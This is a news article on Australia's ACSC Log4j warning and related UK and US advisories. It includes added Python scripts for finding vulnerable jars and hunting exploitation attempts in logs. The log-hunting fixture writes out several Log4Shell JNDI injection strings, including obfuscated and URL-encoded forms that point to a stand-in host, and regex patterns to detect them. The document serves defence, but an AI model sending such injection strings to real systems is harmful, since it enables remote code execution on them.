Australia warns that cybercriminals scanning entities for serious cyber vulnerabilities, following Log4j attack


The Australian Cyber Security Centre (ACSC) said on Tuesday that it is seeing cybercriminals attempting to find those who remain vulnerable to the Log4j software vulnerability, as malicious cyber adversaries conduct thousands of scans in search of the vulnerability. In the light of this, the security agency has asked Australian businesses and individuals to ‘urgently patch their applications and software products.’

The cybersecurity agency said that thousands of software products that use this common piece of computer code are at risk from cybercriminals, and many are yet to be fixed. “If not fixed, cyber attackers can break into an organisation’s systems, steal user passwords and login details, extract sensitive data, and infect its networks with malicious software causing widespread business interruption,” it added.

The Australian guidance comes as a third Log4j vulnerability has been discovered – this time for a Denial of Service (DoS) bug. Tracked as CVE-2021-45105, the latest Log4j bug isn’t a variant of the Log4Shell remote-code execution bug, though it is said to have similar components, and can also abuse the attacker-controlled lookups in logged data. This issue was fixed in Log4j 2.17.0 and 2.12.3.

Given the current focus on Log4j vulnerabilities by both the security research community and cybercriminals, additional vulnerabilities may be discovered within Log4j. Australian organizations are strongly encouraged to remain aware of any emerging vulnerabilities and available patches.

The ACSC is aware of around 400 vendors who may use this library. These vendors are responsible for some of the most common software globally, including messaging and productivity applications, mobile device managers, teleconference software, web hosting, and video games. The ACSC said that it is working with a significant number of victims and affected vendors across all sectors of the economy.

Assistant Minister for Defence Andrew Hastie said thousands of Australian organizations had already been subject to targeted reconnaissance, and many have been exploited and compromised.

“This is a serious vulnerability in affected systems, akin to leaving every door and window in your home unlocked on Christmas Eve,” Hastie said in a media statement. “It is absolutely critical that Australian businesses and households patch their systems and networks urgently before going on holidays. Not doing so will give our cyber adversaries an early Christmas present. Cybercriminals don’t take a holiday for the Christmas season. They are ruthless and opportunistic.”

“This requires immediate action,” according to Hastie. “Therefore I am calling on all Australian businesses and households to ensure their applications and products are patched and up-to-date, and to follow the ACSC advisories. Even after patching, organisations must continue to monitor to see if any attackers are still lurking in their systems,” Hastie added.

Log4j is a widely used open-source logging library for Java applications. It works as a key building block, reused to provide logging functionality that helps system developers troubleshoot, in a large number of applications globally. Over 100,000 products from hundreds of vendors, as well as in-house developed software, may contain Log4j. If left unfixed, cybercriminals can gain control of vulnerable systems, steal personal data, passwords, and files, and install backdoors for future access, cryptocurrency mining tools, and ransomware.

The Australian agency also notes that a large number of third-party applications may be vulnerable to exploitation. Google estimates that more than 35,000 Java packages may be affected, 80 times more than the median Java vulnerability.

The advisory has asked individuals to update applications as soon as vendor patches become available, and make sure devices and applications are secure by updating regularly and setting automatic updates where possible.

Organizations have been asked to contact their vendors and apply the latest patches immediately where Log4j is known to be used. They should also check internally developed or in-house software for use of Log4j and upgrade to the latest version of Log4j, or consider disabling the ‘JndiLookup’ class. Software vendors should identify their use of the Log4j logging library in their products and develop the required patches, incorporating the latest available version of Log4j, to help their customers remediate the vulnerability on their systems.

Where upgrading is not possible, organizations should apply the hardening advice to disable the JndiLookup class. For software that organizations directly manage, mitigation advice on how to disable JNDI (Java Naming and Directory Interface) lookups has been published in many places.
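The two steps above, finding Log4j in software you manage and disabling the JndiLookup class where an upgrade is not yet possible, can be scripted. The following is an added example, not code from the ACSC advisory: it walks a directory for jar files, reads the log4j-core version from the Maven `pom.properties` entry that the official jars carry, checks for the `org/apache/logging/log4j/core/lookup/JndiLookup.class` entry, and writes a copy of a jar with that class removed. The version threshold uses only the fixed releases named in this article (2.17.0 and 2.12.3); nested jars inside WAR or EAR archives are not unpacked, and the sample jar built by `build_sample_jar` is a constructed stand-in with placeholder contents, not a real Log4j build.

```python
"""Inventory Log4j jars on disk and produce a hardened copy without JndiLookup.

Added example, not from the ACSC advisory. Assumes the Maven layout of the
official log4j-core jars; nested jars inside WAR/EAR files are not handled.
"""
import os
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text):
    """Turn '2.14.1' into a comparable tuple; unparseable input becomes ()."""
    try:
        return tuple(int(part) for part in text.strip().split("."))
    except ValueError:
        return ()


def needs_upgrade(version):
    """True unless the version is at or above a fixed release named in the advisory
    (2.12.3 for the 2.12 line, 2.17.0 otherwise). Unknown versions are treated as affected."""
    v = parse_version(version)
    if not v:
        return True
    if v[:2] == (2, 12):
        return v < (2, 12, 3)
    return v < (2, 17, 0)


def inspect_jar(path):
    """Return (log4j-core version or None, whether JndiLookup.class is present)."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        return version, JNDI_LOOKUP_CLASS in names


def scan_directory(root):
    """Walk root and report every jar that carries log4j-core markers."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            try:
                version, has_jndi = inspect_jar(path)
            except zipfile.BadZipFile:
                continue  # not a valid archive; skip rather than abort the inventory
            if version is None and not has_jndi:
                continue
            findings.append({
                "path": path,
                "version": version,
                "jndi_lookup_present": has_jndi,
                "needs_upgrade": needs_upgrade(version or ""),
            })
    return findings


def strip_jndi_lookup(src, dst):
    """Write a copy of src without JndiLookup.class; returns True if the class was removed.
    Removing the class is the interim hardening step; the jar still needs the real upgrade."""
    removed = False
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            if item.filename == JNDI_LOOKUP_CLASS:
                removed = True
                continue
            zout.writestr(item, zin.read(item.filename))
    return removed


def build_sample_jar(path, version="2.14.1"):
    """Constructed stand-in for an affected log4j-core jar; entries are placeholders, not bytecode."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPERTIES,
                    f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr(JNDI_LOOKUP_CLASS, b"placeholder, not real bytecode")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"placeholder")


def demo():
    """Scan a temporary tree before and after hardening; returns both inventories."""
    with tempfile.TemporaryDirectory() as tmp:
        jar = os.path.join(tmp, "lib", "log4j-core-2.14.1.jar")
        os.makedirs(os.path.dirname(jar))
        build_sample_jar(jar)
        before = scan_directory(tmp)
        hardened = jar + ".hardened"
        strip_jndi_lookup(jar, hardened)
        os.replace(hardened, jar)
        after = scan_directory(tmp)
        return before, after


if __name__ == "__main__":
    for stage, inventory in zip(("before", "after"), demo()):
        for finding in inventory:
            print(stage, finding)
```

Note that after the class is stripped the jar still reports `needs_upgrade`: removing JndiLookup blocks the lookup path but does not change the library version, so the inventory keeps flagging it until the vendor patch or upgrade is applied, which is the distinction the advisory draws between hardening and patching.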

Australian organizations should identify vulnerable applications and services running in their environment. The ACSC further recommends that organizations check the logs of these systems for evidence of exploitation attempts using the Log4j techniques.

System administrators should check potentially vulnerable servers for outbound traffic to hosts outside the local network which may indicate communication with command and control nodes or traffic to internal hosts indicating attempts of lateral movement. If present, any activity detected using this method warrants further investigation.
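The two log checks recommended above can be expressed as a small hunting script. The following is an added example, not code from the ACSC advisory. The first function looks through web-server access-log lines for the JNDI lookup string (URL-decoding the line and collapsing the single-character nested lookups that scanners commonly wrap around it, so a naive `${jndi:` match is not defeated); the second takes a simple connection log and, for the hosts identified as potentially vulnerable, flags outbound connections to addresses outside the organisation's own ranges and connections to internal hosts that are not on a known baseline. Both log samples are constructed, the `LOCAL_NETS` ranges and the `EXPECTED_INTERNAL_PEERS` baseline are assumptions about the environment, and all addresses are documentation or private addresses.

```python
"""Hunt for Log4j exploitation indicators in constructed access and connection logs.

Added example, not part of the ACSC advisory. Assumes combined-format web
access logs and a 'src dst:port' connection log; samples below are constructed.
"""
import ipaddress
import re
from urllib.parse import unquote

# The lookup marker after normalisation.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Single-character nested lookups used to disguise the marker: ${lower:j}, ${upper:N}, ${::-d}
NESTED_RE = re.compile(r"\$\{(?:lower|upper)\s*:\s*([^}$])\}|\$\{\s*:+-?([^}$])\}", re.IGNORECASE)

# Assumed organisation-owned ranges; anything else counts as "outside the local network".
LOCAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Constructed baseline: internal peers the application servers normally talk to.
EXPECTED_INTERNAL_PEERS = {"10.0.0.5"}

# Constructed access-log lines (combined format); 203.0.113.x, 198.51.100.x and 192.0.2.x are documentation ranges.
ACCESS_LOG = [
    '203.0.113.7 - - [20/Dec/2021:10:01:02 +1100] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Dec/2021:10:01:05 +1100] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '198.51.100.22 - - [20/Dec/2021:10:02:11 +1100] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '192.0.2.33 - - [20/Dec/2021:10:03:40 +1100] "GET /health HTTP/1.1" 200 17 "-" "${${lower:j}ndi:rmi://198.51.100.9/c}"',
    '10.0.0.12 - - [20/Dec/2021:10:04:00 +1100] "POST /api HTTP/1.1" 201 90 "-" "internal-monitor"',
]
# Constructed connection log: 'source destination:port'.
CONN_LOG = [
    "10.0.0.20 10.0.0.5:5432",
    "10.0.0.20 198.51.100.9:1389",
    "10.0.0.20 10.0.0.44:445",
    "10.0.0.21 10.0.0.5:5432",
]


def normalize(text):
    """URL-decode (twice, for double-encoded requests) and collapse nested lookups
    until nothing changes, so that the bare ${jndi: marker can be matched."""
    text = unquote(unquote(text))
    previous = None
    while previous != text:
        previous = text
        text = NESTED_RE.sub(lambda m: m.group(1) or m.group(2), text)
    return text


def find_jndi_attempts(lines):
    """Return (line_number, client_ip) for every access-log line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        if JNDI_RE.search(normalize(line)):
            hits.append((number, line.split(" ", 1)[0]))
    return hits


def is_local(addr):
    return any(addr in net for net in LOCAL_NETS)


def unexpected_outbound(conn_lines, server_ips, expected_peers=EXPECTED_INTERNAL_PEERS):
    """For the given potentially vulnerable servers, flag outbound connections to addresses
    outside LOCAL_NETS ('external') and to internal hosts not in the baseline ('internal')."""
    findings = []
    for line in conn_lines:
        src, dst_port = line.split()
        dst, port = dst_port.rsplit(":", 1)
        if src not in server_ips:
            continue
        if not is_local(ipaddress.ip_address(dst)):
            findings.append((src, dst, int(port), "external"))
        elif dst not in expected_peers:
            findings.append((src, dst, int(port), "internal"))
    return findings


if __name__ == "__main__":
    for number, client in find_jndi_attempts(ACCESS_LOG):
        print(f"access log line {number}: JNDI lookup from {client}")
    for src, dst, port, kind in unexpected_outbound(CONN_LOG, {"10.0.0.20"}):
        print(f"{kind} connection {src} -> {dst}:{port} warrants investigation")
```

Every hit from either function is a lead rather than a verdict: as the advisory says, the presence of the lookup string in a request shows an attempt, and unexpected outbound or lateral connections from the same servers are what distinguish an attempt from a likely compromise.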

The U.K.’s National Cyber Security Centre (NCSC) also updated its advisory asking organizations on Tuesday to take steps to mitigate the Apache Log4j vulnerabilities. Affected UK organizations have been asked to report any evidence of compromise relating to the vulnerability to the NCSC through the website.

“The NCSC is aware of widespread scanning for this vulnerability and we note that almost all organisations will have received HTTP requests with the JNDI string. We do not require reports of scanning activity,” it added in its latest alert. 

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive last Friday asking federal civilian executive branch agencies to mitigate the threats caused by the Apache Log4j series of vulnerabilities.

CISA has asked the federal civilian executive branch agencies to enumerate all solution stacks accepting data input from the internet, and evaluate all software assets in identified solution stacks against the CISA-managed GitHub repository to determine whether Log4j is present in those assets and if so, whether those assets are affected by the vulnerability by 5 pm EST on Dec. 23.
